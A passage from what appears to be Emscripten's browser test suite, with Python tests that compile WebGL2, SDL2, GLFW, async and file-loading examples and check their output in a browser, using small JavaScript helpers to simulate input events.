# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(path_from_root('tests', 'html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest(path_from_root('tests', 'test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(path_from_root('tests', 'webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=self.get_async_args())
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2'] + self.get_async_args())
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([path_from_root('tests', 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', 0, args=['-s', 'USE_SDL=2'])
@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', 0, args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', path_from_root('tests', 'sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(path_from_root('tests', 'sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2'] + self.get_async_args())
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=self.get_async_args() + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js'] + self.get_async_args())
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling'] + self.get_async_args())
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling'] + self.get_async_args())
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + self.get_async_args())
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts)] + self.get_async_args())
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL'] + self.get_async_args(), timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os'] + self.get_async_args())
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=self.get_async_args())
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=self.get_async_args())
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_test_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=["waka"]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure', '1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
